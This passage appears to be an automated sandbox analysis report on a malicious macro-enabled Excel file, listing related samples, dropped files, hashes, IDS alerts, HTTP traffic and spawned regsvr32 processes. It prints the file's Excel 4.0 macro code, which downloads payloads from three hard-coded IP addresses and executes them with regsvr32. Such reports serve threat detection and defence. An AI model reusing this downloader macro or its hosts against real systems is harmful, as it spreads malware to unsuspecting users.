                HSAEPermission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 185.117.73.74
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 185.117.73.74
                xa6FEoUw0W.dllGet hashmaliciousBrowse
                • 188.116.36.211
                tszs3mwUbe.exeGet hashmaliciousBrowse
                • 185.45.193.29
                pZ50mMKSLi.exeGet hashmaliciousBrowse
                • 185.45.193.29
                qTnwCotzR9.exeGet hashmaliciousBrowse
                • 185.45.193.29
                PwBsqWQ7jJ.exeGet hashmaliciousBrowse
                • 185.45.193.29
                aGDehjYIws.exeGet hashmaliciousBrowse
                • 185.198.57.204
                Tjhsm8p85Y.exeGet hashmaliciousBrowse
                • 185.45.193.29
                T23HJFoN2Y.exeGet hashmaliciousBrowse
                • 185.45.193.29
                i7NsO9mhTD.exeGet hashmaliciousBrowse
                • 185.45.193.29
                o7w2HSi17V.exeGet hashmaliciousBrowse
                • 185.141.27.225
                AB1CEF822F66D7B77574A21C8154D4A6E9FCD196A6659.exeGet hashmaliciousBrowse
                • 185.198.57.204
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 194.36.189.154

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\94954BDE.jpg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2021:02:11 21:11:18], baseline, precision 8, 1860x1000, frames 3
                Category:dropped
                Size (bytes):139381
                Entropy (8bit):7.677272725029824
                Encrypted:false
                SSDEEP:3072:CmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOy:54P4346PgZw9gQat
                MD5:53918FB868F1540920FC189C6783FC7C
                SHA1:135CB103C5B5125C80285A83AE728B559313BADC
                SHA-256:7F6AD5212338A6586251AEF92D2543AA8E70C815FE0BF7ADDCE2C0A83D20A0B3
                SHA-512:31391EFC3D377EA32A537EF3DDCA41ABAF34C4C83CDFEF9A64D40DE219B88A293BE2BF01D6A5D2B23365513CB880020F37CA8E90506C41FB7FC8E42D4D641F51
                Malicious:false
                Reputation:low
                Preview: ....!jExif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS6 (Windows).2021:02:11 21:11:18..........................D.......................................................&.(................................ 4.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                C:\Users\user\AppData\Local\Temp\EBCE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153117
                Entropy (8bit):7.664539669110037
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO4U3:cng4P4346PgZw9gQak
                MD5:6AA2E8DD7F57C5DE42A823C00C5DCB36
                SHA1:A0334ABC59C4A2895B71720996F1E5FDFB673004
                SHA-256:A6E8B5DF4BE3297072D51B198CBA6B8B047A43136A953DE8443AD5749E826A8B
                SHA-512:3405DCE72DA172ED110D661167E3A853CBF3443D820392304E47895064B5BD982799BAE9AF6FC76B6C42BCDE3CDC93F715105E9F82FCB9621977387C868A8881
                Malicious:false
                Reputation:low
                Preview: ...N.0...+....(q.V...X8......41.?y..o..dw..i.{i..3....x..+k.7.....E5a.8.vM.~=..Y.I8%.wP.5 ...}.>..`A..k..~p...+.....,|.".mlx.r)........%p.L...M..B..T...F.\;V.l~.Q5.!.-E"....H...-Ay.j.u.!.P..$k..5....D......A..*..a........r......i..|..d...`...G....._....r...:..iZ,a%.T]d..2.['..hMh.a....D.].N@../9...I.x@G.{................B...&z..w.....@......L..4.".".zJt`4_.....:T..Y..~.|..F.\)..i........tz?F...D...>N.\].j.1i...}GWO..2..3s ./.j..w.r........PK..........!...&n....o.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Jun 26 00:28:37 2021, atime=Sat Jun 26 00:28:37 2021, length=8192, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.471010949234031
                Encrypted:false
                SSDEEP:12:85QCELgXg/XAlCPCHaXgzB8IB/mxRlvX+WnicvbVbDtZ3YilMMEpxRljKVTdJP9O:85hy/XTwz6I0DxYeFDv3q8rNru/
                MD5:7F845914F5AAA336F23545CE948F7659
                SHA1:1AF9A317EC16CC38031824466A4F0E2504447F91
                SHA-256:73E53ED1F83AC7ADBBA9F958BF521711349CF35CF783CA312F243F91A4A62493
                SHA-512:79BC2B3D32104CA3E65B750286C39F68D62F36D1921066FE22626B0709D4085F7D4B39BCC858AFF94CDFE97E4588E3D2B0AA2B9371DC1558977375096A1D1EFF
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G..0.z.*j..0.z.*j... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......910646..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Permission-1984690372-06252021.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Sat Jun 26 00:28:37 2021, atime=Sat Jun 26 00:28:37 2021, length=153117, window=hide
                Category:dropped
                Size (bytes):2238
                Entropy (8bit):4.5303789406700306
                Encrypted:false
                SSDEEP:48:8Rk/XT3IkK2wDJ962w88Qh2Rk/XT3IkK2wDJ962w88Q/:8Rk/XLIkgR8Qh2Rk/XLIkgR8Q/
                MD5:65F3F046100DC5C6A6B7C061A76A39A6
                SHA1:4E7715EFEF4DBFA2A1757BC88B9411D8BE1917D5
                SHA-256:4325ED557385E7711E82ECDFDA184F3FC903C5CB13D111DCF0072C3C5C458E96
                SHA-512:D002BAF7255B39908208F9AE84A4BE9CFB1CF4D75F27E5FFDB9963E38B53AF36A6FC30C0F76A38B042058E54FEF7BC2487255049BCC26FD11170C5F19206AA3F
                Malicious:false
                Reputation:low
                Preview: L..................F.... ....%5..{..o.v.*j..0.z.*j...V...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..X...R.. .PERMIS~1.XLS..t.......Q.y.Q.y*...8.....................P.e.r.m.i.s.s.i.o.n.-.1.9.8.4.6.9.0.3.7.2.-.0.6.2.5.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\Permission-1984690372-06252021.xlsm.:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.e.r.m.i.s.s.i.o.n.-.1.9.8.4.6.9.0.3.7.2.-.0.6.2.5.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):145
                Entropy (8bit):4.777412663289588
                Encrypted:false
                SSDEEP:3:oyBVomxW+Lxz5XQ8UltLxz5XQ8UlmxW+Lxz5XQ8Ulv:djHz5AZ/Fz5AZaz5AZ1
                MD5:6D8FB5FDA4AB751BD06AD0503EEEDE2B
                SHA1:D1FAA288305EB17300E14947E3A7849589D6F70B
                SHA-256:67627E5AFA83D27D4399C77D411684204CF1C9532A101A8F1FF9AA85723097BB
                SHA-512:057588ACE7096CF408DAB9A14886F0A4CAAED80E71E7960AF74AEF5127AD7B04244D62D5CBB2823129F38BC8BE42569154EC1BC5EF1867C93FCCDC3E2D683A71
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[misc]..Permission-1984690372-06252021.LNK=0..Permission-1984690372-06252021.LNK=0..[misc]..Permission-1984690372-06252021.LNK=0..
                C:\Users\user\Desktop\7CCE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153117
                Entropy (8bit):7.664539669110037
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO4U3:cng4P4346PgZw9gQak
                MD5:6AA2E8DD7F57C5DE42A823C00C5DCB36
                SHA1:A0334ABC59C4A2895B71720996F1E5FDFB673004
                SHA-256:A6E8B5DF4BE3297072D51B198CBA6B8B047A43136A953DE8443AD5749E826A8B
                SHA-512:3405DCE72DA172ED110D661167E3A853CBF3443D820392304E47895064B5BD982799BAE9AF6FC76B6C42BCDE3CDC93F715105E9F82FCB9621977387C868A8881
                Malicious:false
                Reputation:low
                Preview: ...N.0...+....(q.V...X8......41.?y..o..dw..i.{i..3....x..+k.7.....E5a.8.vM.~=..Y.I8%.wP.5 ...}.>..`A..k..~p...+.....,|.".mlx.r)........%p.L...M..B..T...F.\;V.l~.Q5.!.-E"....H...-Ay.j.u.!.P..$k..5....D......A..*..a........r......i..|..d...`...G....._....r...:..iZ,a%.T]d..2.['..hMh.a....D.].N@../9...I.x@G.{................B...&z..w.....@......L..4.".".zJt`4_.....:T..Y..~.|..F.\)..i........tz?F...D...>N.\].j.1i...}GWO..2..3s ./.j..w.r........PK..........!...&n....o.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$Permission-1984690372-06252021.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Reputation:high, very likely benign file
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.666395274852154
                TrID:
                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                • ZIP compressed archive (8000/1) 16.67%
                File name:Permission-1984690372-06252021.xlsm
                File size:153750
                MD5:f9272d851155983c3326ae7bcd99e489
                SHA1:caaa6700907da09efc9d7831ec9a0dc636bdbe74
                SHA256:80a312be7e3162e80ef38492e7c2160af88e1482fb80ea3370761a0c0654478d
                SHA512:3e8d912568a35cc56af075b26f939b08bc5bd3ec0163e4a63c8cb563dcb85c74e7ad6ff9a5e5f457cda57af9edcec724dabda3ac32d89e9409b5c669096d037f
                SSDEEP:3072:mmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOYJ:d4P4346PgZw9gQaVJ
                File Content Preview:PK..........!.........o.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "Permission-1984690372-06252021.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                ,=NOW()&H8,.dat,,,,,,,"=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)","=""http://185.240.103.219/""","=Jerutyg(0,F13&G8,""..\Kro.fis"",0,0)","=""http://190.14.37.3/""","=Jerutyg(0,F14&G8,""..\Kro.fis1"",0,0)","=""http://185.183.99.120/""","=Jerutyg(0,F15&G8,""..\Kro.fis2"",0,0)",,,,,,,,,,,,,,,,,,,,=RUN(Sheet4!I9),
                =EXEC(Sheet2!O22)"=EXEC(Sheet2!O22&""1"")""=EXEC(Sheet2!O22&""2"")"=HALT()

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                06/25/21-18:28:50.560988TCP1201ATTACK-RESPONSES 403 Forbidden8049169190.14.37.3192.168.2.22
                06/25/21-18:28:50.962858TCP1201ATTACK-RESPONSES 403 Forbidden8049170185.183.99.120192.168.2.22

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jun 25, 2021 18:28:46.983198881 CEST4916780192.168.2.22185.240.103.219
                Jun 25, 2021 18:28:47.070900917 CEST8049167185.240.103.219192.168.2.22
                Jun 25, 2021 18:28:47.567629099 CEST4916780192.168.2.22185.240.103.219
                Jun 25, 2021 18:28:47.652913094 CEST8049167185.240.103.219192.168.2.22
                Jun 25, 2021 18:28:48.160312891 CEST4916780192.168.2.22185.240.103.219
                Jun 25, 2021 18:28:48.246817112 CEST8049167185.240.103.219192.168.2.22
                Jun 25, 2021 18:28:48.249515057 CEST4916880192.168.2.22185.240.103.219
                Jun 25, 2021 18:28:48.338891029 CEST8049168185.240.103.219192.168.2.22
                Jun 25, 2021 18:28:48.846990108 CEST4916880192.168.2.22185.240.103.219
                Jun 25, 2021 18:28:48.936548948 CEST8049168185.240.103.219192.168.2.22
                Jun 25, 2021 18:28:49.439831972 CEST4916880192.168.2.22185.240.103.219
                Jun 25, 2021 18:28:49.529444933 CEST8049168185.240.103.219192.168.2.22
                Jun 25, 2021 18:28:49.550668955 CEST4916980192.168.2.22190.14.37.3
                Jun 25, 2021 18:28:49.756808043 CEST8049169190.14.37.3192.168.2.22
                Jun 25, 2021 18:28:49.757050991 CEST4916980192.168.2.22190.14.37.3
                Jun 25, 2021 18:28:49.757635117 CEST4916980192.168.2.22190.14.37.3
                Jun 25, 2021 18:28:49.963090897 CEST8049169190.14.37.3192.168.2.22
                Jun 25, 2021 18:28:50.560987949 CEST8049169190.14.37.3192.168.2.22
                Jun 25, 2021 18:28:50.561289072 CEST4916980192.168.2.22190.14.37.3
                Jun 25, 2021 18:28:50.581809044 CEST4917080192.168.2.22185.183.99.120
                Jun 25, 2021 18:28:50.647761106 CEST8049170185.183.99.120192.168.2.22
                Jun 25, 2021 18:28:50.647874117 CEST4917080192.168.2.22185.183.99.120
                Jun 25, 2021 18:28:50.648982048 CEST4917080192.168.2.22185.183.99.120
                Jun 25, 2021 18:28:50.714696884 CEST8049170185.183.99.120192.168.2.22
                Jun 25, 2021 18:28:50.962857962 CEST8049170185.183.99.120192.168.2.22
                Jun 25, 2021 18:28:50.963026047 CEST4917080192.168.2.22185.183.99.120
                Jun 25, 2021 18:29:55.562064886 CEST8049169190.14.37.3192.168.2.22
                Jun 25, 2021 18:29:55.562181950 CEST4916980192.168.2.22190.14.37.3
                Jun 25, 2021 18:29:55.962322950 CEST8049170185.183.99.120192.168.2.22
                Jun 25, 2021 18:29:55.962764025 CEST4917080192.168.2.22185.183.99.120
                Jun 25, 2021 18:30:46.865757942 CEST4917080192.168.2.22185.183.99.120
                Jun 25, 2021 18:30:46.866034985 CEST4916980192.168.2.22190.14.37.3
                Jun 25, 2021 18:30:46.933026075 CEST8049170185.183.99.120192.168.2.22
                Jun 25, 2021 18:30:47.072385073 CEST8049169190.14.37.3192.168.2.22

                HTTP Request Dependency Graph

                • 190.14.37.3
                • 185.183.99.120

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249169190.14.37.380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Jun 25, 2021 18:28:49.757635117 CEST1OUTGET /44372.7698814815.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 190.14.37.3
                Connection: Keep-Alive
                Jun 25, 2021 18:28:50.560987949 CEST2INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 16:28:50 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.2249170185.183.99.12080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Jun 25, 2021 18:28:50.648982048 CEST2OUTGET /44372.7698814815.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 185.183.99.120
                Connection: Keep-Alive
                Jun 25, 2021 18:28:50.962857962 CEST3INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 16:29:05 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:18:28:35
                Start date:25/06/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fc20000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:28:42
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis
                Imagebase:0xff040000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:28:42
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis1
                Imagebase:0xff040000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:28:42
                Start date:25/06/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 ..\Kro.fis2
                Imagebase:0xff040000
                File size:19456 bytes
                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >